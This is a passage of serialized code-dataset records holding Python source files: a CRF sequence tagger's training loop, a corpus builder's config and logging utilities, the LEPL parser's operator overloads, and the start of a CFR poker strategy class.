= timedelta()\n # 记录最大准确率及对应的迭代次数\n max_e, max_accuracy = 0, 0.0\n\n # 迭代指定次数训练模型\n for epoch in range(1, epochs + 1):\n start = datetime.now()\n # 随机打乱数据\n random.shuffle(trainset)\n # 设置L2正则化系数\n if not regularize:\n lmbda = 0\n # 按照指定大小对数据分割批次\n batches = [trainset[i:i + batch_size]\n for i in range(0, len(trainset), batch_size)]\n nb = len(batches)\n # 根据批次数据更新权重\n for batch in batches:\n if not anneal:\n self.update(batch, lmbda, n, eta)\n # 设置学习速率的指数衰减\n else:\n self.update(batch, lmbda, n, eta * decay ** (count / nb))\n count += 1\n\n print(\"Epoch %d / %d: \" % (epoch, epochs))\n tp, total, accuracy = self.evaluate(trainset)\n print(\"%-6s %d / %d = %4f\" % ('train:', tp, total, accuracy))\n tp, total, accuracy = self.evaluate(devset)\n print(\"%-6s %d / %d = %4f\" % ('dev:', tp, total, accuracy))\n t = datetime.now() - start\n print(\"%ss elapsed\\n\" % t)\n total_time += t\n\n # 保存效果最好的模型\n if accuracy > max_accuracy:\n self.dump(file)\n max_e, max_accuracy = epoch, accuracy\n elif epoch - max_e > interval:\n break\n print(\"max accuracy of dev is %4f at epoch %d\" %\n (max_accuracy, max_e))\n print(\"mean time of each epoch is %ss\\n\" % (total_time / epoch))\n\n def update(self, batch, lmbda, n, eta):\n gradients = defaultdict(float)\n\n for wiseq, tiseq in batch:\n prev_ti = -1\n for i, ti in enumerate(tiseq):\n fiseq = (self.fdict[f]\n for f in self.instantiate(wiseq, i, prev_ti)\n if f in self.fdict)\n for fi in fiseq:\n gradients[fi, ti] += 1\n prev_ti = ti\n\n alpha = self.forward(wiseq)\n beta = self.backward(wiseq)\n logZ = logsumexp(alpha[-1])\n\n fv = self.instantiate(wiseq, 0, -1)\n fiseq = (self.fdict[f] for f in fv if f in self.fdict)\n p = np.exp(self.score(fv) + beta[0] - logZ)\n for fi in fiseq:\n gradients[fi] -= p\n\n for i in range(1, len(tiseq)):\n ufv = self.unigram(wiseq, i)\n ufiseq = [self.fdict[f] for f in ufv if f in self.fdict]\n scores = self.BS + self.score(ufv)\n probs = np.exp(scores + alpha[i - 1][:, None] + beta[i] - logZ)\n\n for bfv, p in zip(self.BF, probs):\n bfiseq = [self.fdict[f] for f in bfv if f in self.fdict]\n for fi in bfiseq + ufiseq:\n gradients[fi] -= p\n\n if lmbda != 0:\n self.W *= (1 
- eta * lmbda / n)\n for k, v in gradients.items():\n self.W[k] += eta * v\n self.BS = np.array([self.score(bfv) for bfv in self.BF])\n\n def forward(self, wiseq):\n T = len(wiseq)\n alpha = np.zeros((T, self.nt))\n\n fv = self.instantiate(wiseq, 0, -1)\n alpha[0] = self.score(fv)\n\n for i in range(1, T):\n uscores = self.score(self.unigram(wiseq, i))\n scores = np.transpose(self.BS + uscores)\n alpha[i] = logsumexp(scores + alpha[i - 1], axis=1)\n return alpha\n\n def backward(self, wiseq):\n T = len(wiseq)\n beta = np.zeros((T, self.nt))\n\n for i in reversed(range(T - 1)):\n uscores = self.score(self.unigram(wiseq, i + 1))\n scores = self.BS + uscores\n beta[i] = logsumexp(scores + beta[i + 1], axis=1)\n return beta\n\n def predict(self, wiseq):\n T = len(wiseq)\n delta = np.zeros((T, self.nt))\n paths = np.zeros((T, self.nt), dtype='int')\n\n fv = self.instantiate(wiseq, 0, -1)\n delta[0] = self.score(fv)\n\n for i in range(1, T):\n uscores = self.score(self.unigram(wiseq, i))\n scores = np.transpose(self.BS + uscores) + delta[i - 1]\n paths[i] = np.argmax(scores, axis=1)\n delta[i] = scores[np.arange(self.nt), paths[i]]\n prev = np.argmax(delta[-1])\n\n predict = [prev]\n for i in reversed(range(1, T)):\n prev = paths[i, prev]\n predict.append(prev)\n predict.reverse()\n return predict\n\n def score(self, fvector):\n scores = np.array([self.W[self.fdict[f]]\n for f in fvector if f in self.fdict])\n return np.sum(scores, axis=0)\n\n def bigram(self, prev_ti):\n return [('01', prev_ti)]\n\n def unigram(self, wiseq, index):\n word = wiseq[index]\n prev_word = wiseq[index - 1] if index > 0 else '^^'\n next_word = wiseq[index + 1] if index < len(wiseq) - 1 else '$$'\n prev_char = prev_word[-1]\n next_char = next_word[0]\n first_char = word[0]\n last_char = word[-1]\n\n fvector = []\n fvector.append(('02', word))\n fvector.append(('03', prev_word))\n fvector.append(('04', next_word))\n fvector.append(('05', word, prev_char))\n fvector.append(('06', word, next_char))\n fvector.append(('07', first_char))\n fvector.append(('08', last_char))\n\n for char in word[1:-1]:\n fvector.append(('09', char))\n fvector.append(('10', first_char, char))\n fvector.append(('11', last_char, char))\n if len(word) == 1:\n fvector.append(('12', word, prev_char, next_char))\n for i in range(1, len(word)):\n prev_char, char = word[i - 1], word[i]\n if prev_char == char:\n fvector.append(('13', char, 'consecutive'))\n if i <= 4:\n fvector.append(('14', word[:i]))\n fvector.append(('15', word[-i:]))\n if len(word) <= 4:\n fvector.append(('14', word))\n fvector.append(('15', word))\n return fvector\n\n def instantiate(self, wiseq, index, prev_ti):\n bigram = self.bigram(prev_ti)\n unigram = self.unigram(wiseq, index)\n return bigram + unigram\n\n def evaluate(self, data):\n tp, total = 0, 0\n\n for wiseq, tiseq in data:\n total += len(wiseq)\n piseq = np.array(self.predict(wiseq))\n tp += np.sum(tiseq == piseq)\n accuracy = tp / total\n return tp, total, accuracy\n\n def dump(self, file):\n with open(file, 'wb') as f:\n pickle.dump(self, f)\n\n @classmethod\n def load(cls, file):\n with open(file, 'rb') as f:\n crf = pickle.load(f)\n return crf\n","repo_name":"yzhangcs/CRF","sub_path":"ocrf.py","file_name":"ocrf.py","file_ext":"py","file_size_in_byte":8293,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"61"} +{"seq_id":"43376353751","text":"#!/usr/bin/env python3\n# -*- coding: utf-8, vim: expandtab:ts=4 -*-\n\nimport os\nimport re\nimport sys\nimport yaml\nimport 
logging\nfrom datetime import date, timedelta, datetime\n\n\ndef wrap_input_consants(current_task_config_filename):\n \"\"\"\n Helper to store and process input data so that main function does not contain so many\n codelines of variable initialization\n Fields should be handled as constants after initialization\n CAPITALIZED KEYS are transformed runtime (e.g. Regular Expressions),\n lowercase keys are present in the config and will be used as is\n \"\"\"\n # Instructions to the current task\n with open(current_task_config_filename, encoding='UTF-8') as fh:\n settings = yaml.load(fh)\n\n # The directory name of the configs\n dir_name = os.path.dirname(os.path.abspath(current_task_config_filename))\n\n # Technical data about the website to crawl\n with open(os.path.join(dir_name, settings['site_schemas']), encoding='UTF-8') as fh:\n current_site_schema = yaml.load(fh)[settings['site_name']]\n\n if len(settings.keys() & current_site_schema.keys()) > 0:\n raise KeyError('Config file key collision!')\n settings.update(current_site_schema)\n\n settings['TAGS_KEYS'] = {re.compile(tag_key): val for tag_key, val in settings['tags_keys'].items()}\n\n # If the program is to create a corpus, then it will load the required tags and compile the REs\n if settings['create_corpus']:\n with open(os.path.join(dir_name, settings['tags']), encoding='UTF-8') as fh:\n all_tags = yaml.load(fh)\n common_tags = all_tags['common']\n\n cleaning_rules = {}\n general_cleaning_rules = common_tags.pop('general_cleaning_rules', {}) # Also remove general rules from common!\n for rule, regex in ((rule, regex) for rule, regex in general_cleaning_rules.items()\n if not rule.endswith('_repl')):\n r = re.compile(regex)\n cleaning_rules[rule] = lambda x: r.sub(general_cleaning_rules['{0}_repl'.format(rule)], x)\n\n site_tags = {}\n for tag_key_readable in settings['TAGS_KEYS'].values():\n site_tags[tag_key_readable] = {}\n if tag_key_readable is not None: # None == Explicitly ignored\n for tag_name, tag_desc in all_tags[tag_key_readable].items():\n site_tags[tag_key_readable][tag_name] = {}\n site_tags[tag_key_readable][tag_name]['open-inside-close'] = re.compile('{0}{1}{2}'.\n format(tag_desc['open'],\n tag_desc['inside'],\n tag_desc['close']))\n site_tags[tag_key_readable][tag_name]['open'] = re.compile(tag_desc['open'])\n site_tags[tag_key_readable][tag_name]['close'] = re.compile(tag_desc['close'])\n\n else:\n site_tags = {}\n common_tags = {'article_begin_mark': '', 'article_end_mark': ''}\n cleaning_rules = {}\n settings['SITE_TAGS'] = site_tags\n settings['COMMON_SITE_TAGS'] = common_tags\n settings['GENERAL_CLEANING_RULES'] = cleaning_rules\n\n settings['BEFORE_ARTICLE_URL_RE'] = re.compile(current_site_schema['before_article_url'])\n settings['AFTER_ARTICLE_URL_RE'] = re.compile(current_site_schema['after_article_url'])\n settings['ARTICLE_URL_FORMAT_RE'] = re.compile('{0}{1}{2}'.format(current_site_schema['before_article_url'],\n current_site_schema['article_url_format'],\n current_site_schema['after_article_url']))\n\n settings['BEFORE_NEXT_PAGE_URL_RE'] = re.compile(current_site_schema['before_next_page_url'])\n settings['AFTER_NEXT_PAGE_URL_RE'] = re.compile(current_site_schema['after_next_page_url'])\n settings['NEXT_PAGE_URL_FORMAT_RE'] = re.compile('{0}{1}{2}'.format(current_site_schema['before_next_page_url'],\n current_site_schema['next_page_url_format'],\n current_site_schema['after_next_page_url']))\n\n settings['BEFORE_ARTICLE_DATE_RE'] = re.compile(current_site_schema['before_article_date'])\n 
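# Illustrative aside (values hypothetical, not from any real site config): each pattern\n    # above is assembled from a before/format/after triple, e.g. before_article_date='/cikk/',\n    # article_date_format='\\d{4}/\\d{2}/\\d{2}' and after_article_date='/'. The combined\n    # *_FORMAT_RE then matches the whole fragment at once, while the separate BEFORE_/AFTER_\n    # REs let callers strip the leading and trailing context from such a match again.\n    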
settings['AFTER_ARTICLE_DATE_RE'] = re.compile(current_site_schema['after_article_date'])\n settings['ARTICLE_DATE_FORMAT_RE'] = re.compile('{0}{1}{2}'.format(current_site_schema['before_article_date'],\n current_site_schema['article_date_format'],\n current_site_schema['after_article_date']))\n\n settings['filter_articles_by_date'] = False\n if 'date_from' in settings and 'date_until' in settings:\n # We generate all URLs FROM the past UNTIL the \"not so past\"\n # Raises ValueError if there is something wrong\n if isinstance(settings['date_from'], datetime):\n raise ValueError('DateError: date_from not datetime ({0})!'.format(settings['date_from']))\n if isinstance(settings['date_until'], datetime):\n raise ValueError('DateError: date_until not datetime ({0})!'.format(settings['date_until']))\n if settings['date_from'] > settings['date_until']:\n raise ValueError('DateError: date_from is later than DATE UNTIL!')\n\n settings['filter_articles_by_date'] = True # Date filtering ON in any other cases OFF\n\n # if there is no time filtering then we use dates only if they are needed to generate URLs\n elif settings['archive_page_urls_by_date']:\n if 'date_from' in settings:\n # We generate all URLs from the first day of the website until yesterday\n if isinstance(settings['date_from'], datetime):\n raise ValueError('DateError: date_from not datetime ({0})!'.format(settings['date_from']))\n else:\n settings['date_from'] = current_site_schema['date_first_article']\n if isinstance(current_site_schema['date_first_article'], datetime):\n raise ValueError('DateError: date_first_article not datetime ({0})!'.\n format(current_site_schema['date_first_article']))\n settings['date_until'] = date.today() - timedelta(1) # yesterday\n\n if settings['date_from'] > settings['date_until']:\n raise ValueError('DateError: date_from is later than DATE UNTIL!')\n\n return settings\n\n\nclass Logger:\n \"\"\"\n Handle logging with Python's built-in logging facilities simplified\n \"\"\"\n def __init__(self, log_filename, console_level='INFO', console_stream=sys.stderr,\n logfile_level='INFO', logfile_mode='a', logfile_encoding='UTF-8'):\n # logging.basicConfig(level=logging.INFO)\n log_levels = {'DEBUG': logging.DEBUG, 'INFO': logging.INFO, 'WARNING': logging.WARNING, 'ERROR': logging.ERROR,\n 'CRITICAL': logging.CRITICAL}\n\n if console_level not in log_levels:\n raise KeyError('Console loglevel is not valid ({0}): {1}'.format(', '.join(log_levels.keys()),\n console_level))\n if logfile_level not in log_levels:\n raise KeyError('Logfile loglevel is not valid ({0}): {1}'.format(', '.join(log_levels.keys()),\n logfile_level))\n\n # Create logger\n self._logger = logging.getLogger(log_filename) # Logger is named after the logfile\n self._logger.propagate = False\n\n # Create handler one for console output and one for logfile and set their properties accordingly\n c_handler = logging.StreamHandler(stream=console_stream)\n f_handler = logging.FileHandler(log_filename, mode=logfile_mode, encoding=logfile_encoding)\n c_handler.setLevel(console_level)\n f_handler.setLevel(logfile_level)\n\n # Create formatters and add them to handlers\n c_format = logging.Formatter('{asctime} {levelname}: {message}', style='{')\n f_format = logging.Formatter('{asctime} {levelname}: {message}', style='{')\n c_handler.setFormatter(c_format)\n f_handler.setFormatter(f_format)\n\n # Add handlers to the logger\n self._logger.addHandler(c_handler)\n self._logger.addHandler(f_handler)\n if console_level < logfile_level:\n 
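# NOTE: the two level names are compared as plain strings here, and the\n            # lexicographic order does not match the numeric logging levels (for\n            # instance 'ERROR' < 'INFO' as strings although ERROR is the higher\n            # level); comparing log_levels[console_level] with\n            # log_levels[logfile_level] would be the robust form. The intent is\n            # to run the logger at the lower of the two levels so that both\n            # handlers still receive every record they are configured for.\n            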
self._logger.setLevel(console_level)\n else:\n self._logger.setLevel(logfile_level)\n\n self._leveled_logger = {'DEBUG': self._logger.debug, 'INFO': self._logger.info, 'WARNING': self._logger.warning,\n 'ERROR': self._logger.error, 'CRITICAL': self._logger.critical}\n\n self.log('INFO', 'Logging started')\n\n def log(self, level, msg):\n if level in self._leveled_logger:\n self._leveled_logger[level](msg)\n else:\n self._leveled_logger['CRITICAL']('UNKNOWN LOGGING LEVEL SPECIFIED FOR THE NEXT ENTRY: {0}'.format(level))\n self._leveled_logger['CRITICAL'](msg)\n\n def __del__(self):\n handlers = list(self._logger.handlers)\n for h in handlers:\n self._logger.removeHandler(h)\n h.flush()\n if isinstance(h, logging.FileHandler):\n h.close()\n","repo_name":"ppke-nlpg/corpusbuilder","sub_path":"corpusbuilder/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":9646,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"2558573504","text":"\nfrom lepl.matchers.matcher import Matcher\nfrom lepl.support.context import Namespace, NamespaceMixin, Scope\nfrom lepl.support.lib import open_stop, format, basestring\n\n\nclass OperatorNamespace(Namespace):\n '''\n Define the default operators.\n '''\n \n def __init__(self):\n # Handle circular dependencies\n from lepl.matchers.error import raise_error\n from lepl.matchers.derived import Space, Add, Apply, KApply, Drop, \\\n Repeat, Map\n from lepl.matchers.combine import And, Or, First\n super(OperatorNamespace, self).__init__({\n SPACE_OPT: lambda a, b: And(a, Space()[0:,...], b),\n SPACE_REQ: lambda a, b: And(a, Space()[1:,...], b),\n ADD: lambda a, b: Add(And(a, b)),\n AND: And,\n OR: Or,\n APPLY: Apply,\n APPLY_RAW: lambda a, b: Apply(a, b, raw=True),\n NOT: Drop,\n KARGS: KApply,\n RAISE: lambda a, b: KApply(a, raise_error(b)),\n REPEAT: Repeat,\n FIRST: First,\n MAP: Map\n })\n \n\nOPERATORS = 'operators'\n'''\nThe name used to retrieve operators definitions.\n'''\n\nSPACE_OPT = '/'\n'''Name for / operator.'''\nSPACE_REQ = '//'\n'''Name for // operator.'''\nADD = '+'\n'''Name for + operator.'''\nAND = '&'\n'''Name for & operator.'''\nOR = '|'\n'''Name for | operator.'''\nAPPLY = '>'\n'''Name for > operator.'''\nAPPLY_RAW = '>='\n'''Name for >= operator.'''\nNOT = '~'\n'''Name for ~ operator.'''\nKARGS = '**'\n'''Name for ** operator.'''\nRAISE = '^'\n'''Name for ^ operator.'''\nREPEAT = '[]'\n'''Name for [] operator.'''\nFIRST = '%'\n'''Name for % operator.'''\nMAP = '>>'\n'''Name for >> operator.'''\n\n\nclass Override(Scope):\n '''\n Allow an operator to be redefined within a with context. 
Uses the \n OPERATORS namespace.\n '''\n\n def __init__(self, space_opt=None, space_req=None, repeat=None,\n add=None, and_=None, or_=None, not_=None, \n apply_=None, apply_raw=None, kargs=None, \n raise_=None, first=None, map_=None):\n super(Override, self).__init__(OPERATORS, OperatorNamespace,\n {SPACE_OPT: space_opt, SPACE_REQ: space_req,\n REPEAT: repeat, ADD: add, AND: and_, OR: or_, \n NOT: not_, APPLY: apply_, APPLY_RAW: apply_raw,\n KARGS: kargs, RAISE: raise_, FIRST: first, MAP: map_})\n\n\nclass _BaseSeparator(Override):\n '''\n Support class for `Separator` and similar classes.\n \n Uses the OPERATORS namespace.\n '''\n \n def __init__(self, separator):\n '''\n If the separator is a string it is coerced to `Regexp()`; if None\n then any previous defined separator is effectively removed.\n '''\n # Handle circular dependencies\n from lepl.matchers.core import Regexp\n from lepl.matchers.combine import And\n from lepl.matchers.derived import Repeat\n from lepl.matchers.support import coerce_\n if separator is None:\n and_ = And\n repeat = Repeat\n else:\n separator = coerce_(separator, Regexp)\n (and_, repeat) = self._replacements(separator)\n super(_BaseSeparator, self).__init__(and_=and_, repeat=repeat)\n\n def _replacements(self, _separator):\n '''\n Sub-classes should return (And, Repeat)\n '''\n raise Exception('Unimplemented')\n \n def _repeat(self, separator):\n '''\n A simple Repeat with separator.\n '''\n from lepl.matchers.combine import And\n from lepl.matchers.derived import Repeat\n def repeat(m, st=0, sp=None, d=0, s=None, a=False):\n '''\n Wrap `Repeat` to adapt the separator.\n '''\n if s is None:\n s = separator\n elif not a:\n s = And(separator, s, separator)\n return Repeat(m, st, sp, d, s, a)\n return repeat\n \n\nclass Separator(_BaseSeparator):\n '''\n Redefine ``[]`` and ``&`` to include the given matcher as a separator \n (so it will be used between list items and between matchers separated by the & \n operator)\n \n Uses the OPERATORS namespace.\n '''\n \n def _replacements(self, separator):\n '''\n Require the separator on each `And`.\n '''\n # Handle circular dependencies\n from lepl.matchers.combine import And\n return (lambda a, b: And(a, separator, b),\n self._repeat(separator))\n \n \nclass DroppedSpace(Separator):\n '''\n Skip spaces (by default, one or more Space()). Any argument is dropped.\n '''\n \n def __init__(self, space=None):\n from lepl.matchers.derived import Space, Drop\n if space is None:\n space = Space()[:]\n space = Drop(space)\n super(DroppedSpace, self).__init__(space)\n \n\nclass SmartSeparator1(_BaseSeparator):\n '''\n Similar to `Separator`, but tried to be clever about whether the \n separator is needed. 
It replaces `&` with a matcher that only uses \n the separator if the second sub-matcher consumes some input.\n \n Uses the OPERATORS namespace.\n \n See also `SmartSeparator2`, which is less general, but more efficient.\n '''\n \n def _replacements(self, separator):\n '''\n Require the separator on each `And`.\n '''\n # Handle circular dependencies\n from lepl.matchers.combine import And, Or\n from lepl.matchers.core import Consumer\n def and_(a, b):\n '''\n Add space only in the case when both consume something.\n '''\n return Or(And(Consumer(a), separator, Consumer(b)),\n And(Consumer(a), Consumer(b, False)),\n And(Consumer(a, False), Consumer(b)),\n And(Consumer(a, False), Consumer(b, False)))\n return (and_, self._repeat(separator))\n \n \nGREEDY = 'g'\n'''Flag (splice increment) for inefficient, guaranteed greedy matching.'''\nNON_GREEDY = 'n'\n'''Flag (splice increment) for inefficient, guaranteed non-greedy matching.'''\nDEPTH_FIRST = 'd'\n'''Flag (splice increment) for efficient, quasi-greedy, matching (default).'''\nBREADTH_FIRST = 'b'\n'''Flag (splice increment) for efficient, quasi-non-greedy, matching.'''\n\n\nclass OperatorMixin(NamespaceMixin):\n '''\n Define the operators used to combine elements in a grammar specification.\n '''\n\n def __init__(self, name, namespace):\n super(OperatorMixin, self).__init__(name, namespace)\n \n def __add__(self, other):\n '''\n **self + other** - Join strings, merge lists.\n \n Combine adjacent matchers in sequence, merging the result with \"+\" \n (so strings are joined, lists merged).\n \n :Parameters:\n \n other\n Another matcher or a string that will be converted to a literal\n match.\n '''\n self.__check(ADD, other, True)\n return self._lookup(ADD)(self, other)\n\n def __radd__(self, other):\n '''\n **other + self** - Join strings, merge lists.\n \n Combine adjacent matchers in sequence, merging the result with \"+\" \n (so strings are joined, lists merged).\n \n :Parameters:\n \n other\n Another matcher or a string that will be converted to a literal\n match.\n '''\n self.__check(ADD, other, True)\n return self._lookup(ADD)(other, self)\n\n def __and__(self, other):\n '''\n **self & other** - Append results.\n \n Combine adjacent matchers in sequence. This is equivalent to \n `And()`.\n \n :Parameters:\n \n other\n Another matcher or a string that will be converted to a literal\n match.\n '''\n self.__check(AND, other, True)\n return self._lookup(AND)(self, other) \n \n def __rand__(self, other):\n '''\n **other & self** - Append results.\n \n Combine adjacent matchers in sequence. This is equivalent to \n `And()`.\n \n :Parameters:\n \n other\n Another matcher or a string that will be converted to a literal\n match.\n '''\n self.__check(AND, other, True)\n return self._lookup(AND)(other, self)\n \n def __div__(self, other):\n '''\n For 2.6\n '''\n return self.__truediv__(other)\n \n def __rdiv__(self, other):\n '''\n For 2.6\n '''\n return self.__rtruediv__(other)\n \n def __truediv__(self, other):\n '''\n **self / other** - Append results, with optional separating space.\n \n Combine adjacent matchers in sequence, with an optional space between\n them. 
The space is included in the results.\n \n :Parameters:\n \n other\n Another matcher or a string that will be converted to a literal\n match.\n '''\n self.__check(SPACE_OPT, other, True)\n return self._lookup(SPACE_OPT)(self, other)\n \n def __rtruediv__(self, other):\n '''\n **other / self** - Append results, with optional separating space.\n \n Combine adjacent matchers in sequence, with an optional space between\n them. The space is included in the results.\n \n :Parameters:\n \n other\n Another matcher or a string that will be converted to a literal\n match.\n '''\n self.__check(SPACE_OPT, other, True)\n return self._lookup(SPACE_OPT)(other, self)\n \n def __floordiv__(self, other):\n '''\n **self // other** - Append results, with required separating space.\n \n Combine adjacent matchers in sequence, with a space between them. \n The space is included in the results.\n \n :Parameters:\n \n other\n Another matcher or a string that will be converted to a literal\n match.\n '''\n self.__check(SPACE_REQ, other, True)\n return self._lookup(SPACE_REQ)(self, other)\n \n def __rfloordiv__(self, other):\n '''\n **other // self** - Append results, with required separating space.\n \n Combine adjacent matchers in sequence, with a space between them. \n The space is included in the results.\n \n :Parameters:\n \n other\n Another matcher or a string that will be converted to a literal\n match.\n '''\n self.__check(SPACE_REQ, other, True)\n return self._lookup(SPACE_REQ)(other, self)\n \n def __or__(self, other):\n '''\n **self | other** - Try alternative matchers.\n \n This introduces backtracking. Matches are tried from left to right\n and successful results returned (one on each \"recall\"). This is \n equivalent to `Or()`.\n \n :Parameters:\n \n other\n Another matcher or a string that will be converted to a literal\n match.\n '''\n self.__check(OR, other, True)\n return self._lookup(OR)(self, other) \n \n def __ror__(self, other):\n '''\n **other | self** - Try alternative matchers.\n \n This introduces backtracking. Matches are tried from left to right\n and successful results returned (one on each \"recall\"). This is \n equivalent to `Or()`.\n \n :Parameters:\n \n other\n Another matcher or a string that will be converted to a literal\n match.\n '''\n self.__check(OR, other, True)\n return self._lookup(OR)(other, self) \n \n def __mod__(self, other):\n '''\n **self % other** - Take first match (committed choice).\n \n Matches are tried from left to right and the first successful result\n is returned. This is equivalent to `First()`.\n \n :Parameters:\n \n other\n Another matcher or a string that will be converted to a literal\n match.\n '''\n self.__check(FIRST, other, True)\n return self._lookup(FIRST)(self, other) \n \n def __rmod__(self, other):\n '''\n **other % self** - Take first match (committed choice).\n \n Matches are tried from left to right and the first successful result\n is returned. This is equivalent to `First()`.\n \n :Parameters:\n \n other\n Another matcher or a string that will be converted to a literal\n match.\n '''\n self.__check(FIRST, other, True)\n return self._lookup(FIRST)(other, self) \n \n def __invert__(self):\n '''\n **~self** - Discard the result.\n\n This generates a matcher that behaves as the original, but returns\n an empty list. 
This is equivalent to `Drop()`.\n \n Note that `Lookahead()` overrides this method to have\n different semantics (negative lookahead).\n '''\n return self._lookup(NOT)(self) \n \n def __getitem__(self, indices):\n '''\n **self[start:stop:algorithm, separator, ...]** - Repetition and lists.\n \n This is a complex statement that modifies the current matcher so\n that it matches several times. A separator may be specified\n (eg for comma-separated lists) and the results may be combined with\n \"+\" (so repeated matching of characters would give a word).\n \n start:stop:algorithm\n This controls the number of matches made and the order in which\n different numbers of matches are returned.\n \n [start]\n Repeat exactly *start* times\n \n [start:stop]\n Repeat *start* to *stop* times (starting with as many matches\n as possible, and then decreasing as necessary).\n \n [start:stop:algorithm]\n Direction selects the algorithm for searching.\n \n 'b' (BREADTH_FIRST)\n A breadth first search is used, which tends to give shorter\n matches before longer ones. This tries all possible matches for \n the sub-matcher first (before repeating calls to consume more \n of the stream). If the sub-matcher does not backtrack then this \n guarantees that the number of matches returned will not decrease \n (ie will monotonically increase) on backtracking.\n \n 'd' (DEPTH_FIRST)\n A depth first search is used, which tends to give longer\n matches before shorter ones. This tries to repeats matches \n with the sub-matcher, consuming as much of the stream as \n possible, before backtracking to find alternative matchers.\n If the sub-matcher does not backtrack then this guarantees\n that the number of matches returned will not increase (ie will\n monotonically decrease) on backtracking.\n \n 'g' (GREEDY)\n An exhaustive search is used, which finds all results (by \n breadth first search) and orders them by length before returning \n them ordered from longest to shortest. This guarantees that\n the number of matches returned will not increase (ie will\n monotonically decrease) on backtracking, but can consume a lot \n of resources.\n \n 'n' (NON_GREEDY)\n As for 'g' (GREEDY), but results are ordered shortest to \n longest. This guarantees that the number of matches returned \n will not decrease (ie will monotonically increase) on \n backtracking, but can consume a lot of resources,\n \n Values may be omitted; the defaults are: *start* = 0, *stop* = \n infinity, *algorithm* = 'd' (DEPTH_FIRST).\n\n separator\n If given, this must appear between repeated values. Matched\n separators are returned as part of the result (unless, of course,\n they are implemented with a matcher that returns nothing). If \n *separator* is a string it is converted to a literal match.\n\n ...\n If ... (an ellipsis) is given then the results are joined together\n with \"+\". \n\n Examples\n --------\n \n Any()[0:3,...] 
will match 3 or less characters, joining them\n together so that the result is a single string.\n \n Word()[:,','] will match a comma-separated list of words.\n \n value[:] or value[0:] or value[0::'d'] is a \"greedy\" match that,\n if value does not backtrack, is equivalent to the \"*\" in a regular\n expression.\n value[::'n'] is the \"non-greedy\" equivalent (preferring as short a \n match as possible) and value[::'g'] is greedy even when value does\n provide alternative matches on backtracking.\n '''\n start = 0\n stop = None\n step = DEPTH_FIRST\n separator = None\n add = False\n if not isinstance(indices, tuple):\n indices = [indices]\n for index in indices:\n if isinstance(index, int):\n start = index\n stop = index\n step = DEPTH_FIRST\n elif isinstance(index, slice):\n start = index.start if index.start != None else 0\n stop = index.stop if not open_stop(index) else None\n step = index.step if index.step != None else DEPTH_FIRST\n elif index == Ellipsis:\n add = True\n elif separator is None:\n separator = index\n else:\n raise TypeError(index)\n return self._lookup(REPEAT)(self, start, stop, step, separator, add)\n \n def __gt__(self, function):\n '''\n **self > function** - Process or label the results.\n \n Create a named pair or apply a function to the results. This is\n equivalent to `Apply()`.\n \n :Parameters:\n \n function\n This can be a string or a function.\n \n If a string is given each result is replaced by a \n (name, value) pair, where name is the string and value is the\n result.\n \n If a function is given it is called with the results as an\n argument. The return value is used *within a list* as the new \n result. This is equivalent to `Apply()` with raw=False.\n '''\n self.__check(APPLY, function, False)\n return self._lookup(APPLY)(self, function) \n \n def __ge__(self, function):\n '''\n **self >= function** - Process or label the results.\n \n Apply a function to the results. \n This is equivalent to `Apply(raw=True)`.\n \n :Parameters:\n \n function\n This is called with the results as an argument. The return value \n is used as the new result. This is equivalent to `Apply()` with \n raw=True.\n '''\n self.__check(APPLY_RAW, function, False)\n return self._lookup(APPLY_RAW)(self, function) \n \n def __rshift__(self, function):\n '''\n **self >> function** - Process or label the results (map).\n \n Create a named pair or apply a function to each result in turn. \n This is equivalent to `Map()`. 
It is similar to \n *self >= function*, except that the function is applied to each \n result in turn.\n \n :Parameters:\n \n function\n This can be a string or a function.\n \n If a string is given each result is replaced by a \n (name, value) pair, where name is the string and value is the\n result.\n \n If a function is given it is called with each result in turn.\n The return values are used as the new result.\n '''\n self.__check(MAP, function, False)\n return self._lookup(MAP)(self, function) \n \n def __pow__(self, function):\n '''\n **self \\** function** - Process the results (\\**kargs).\n \n Apply a function to keyword arguments\n This is equivalent to `KApply()`.\n \n :Parameters:\n \n function\n A function that is called with the keyword arguments described below.\n The return value is used as the new result.\n\n Keyword arguments:\n \n stream_in\n The stream passed to the matcher.\n \n stream_out\n The stream returned from the matcher.\n \n results\n A list of the results returned.\n '''\n self.__check(KARGS, function, False)\n return self._lookup(KARGS)(self, function) \n \n def __xor__(self, message):\n '''\n **self ^ message**\n \n Raise a SyntaxError.\n \n :Parameters:\n \n message\n The message for the SyntaxError.\n '''\n return self._lookup(RAISE)(self, message)\n \n def __check(self, name, other, is_match):\n '''\n Provide some diagnostics if the syntax is completely mixed up.\n '''\n if not isinstance(other, basestring): # can go either way\n if is_match != isinstance(other, Matcher):\n if is_match:\n msg = 'The operator {0} for {1} was applied to something ' \\\n 'that is not a matcher ({2}).'\n else:\n msg = 'The operator {0} for {1} was applied to a matcher ' \\\n '({2}).'\n msg += ' Check syntax and parentheses.'\n raise SyntaxError(format(msg, name, self, other))\n\n","repo_name":"willtang/lyx2ebook","sub_path":"src/lepl/matchers/operators.py","file_name":"operators.py","file_ext":"py","file_size_in_byte":22169,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"61"}
+{"seq_id":"33478929277","text":"from bloodRiverGame import bloodRiver\nimport numpy as np\nfrom copy import deepcopy\nfrom bloodRiverGame import hashabledict\nimport eval7\n\n\nclass bloodyStream:\n\n def __init__(self):\n #access via dic[infoset][action]\n #We define the action strategy/regret indices as follows:\n #['FOLD', 'CALL', 'RAISE', 'CHECK', 'BET']\n #[ 0, 1, 2, 3, 4]\n self.regretSum = {0: {}, 1: {}}\n self.strategySum = {0: {}, 1: {}}\n self.strategy = {0: {}, 1: {}}\n self.actionIndex = {'FOLD': 0, 'CALL': 1, 'RAISE': 2, 'CHECK': 3, 'BET': 4}\n \n\n def getStrategy(self, infohash, currentPlayer):\n '''Returns the strategy for the current player via regret matching'''\n\n normalizingSum = 0\n #print(self.regretSum, 'hiiiiiiiiiiiiiii')\n\n for i in range(5):\n # Regret matching: weight each action by its positive regret\n self.strategy[currentPlayer][infohash][i] = max(self.regretSum[currentPlayer][infohash][i], 0)\n normalizingSum += self.strategy[currentPlayer][infohash][i]\n\n if normalizingSum > 0: \n for i in range(5): \n self.strategy[currentPlayer][infohash][i] = self.strategy[currentPlayer][infohash][i]/normalizingSum\n else: 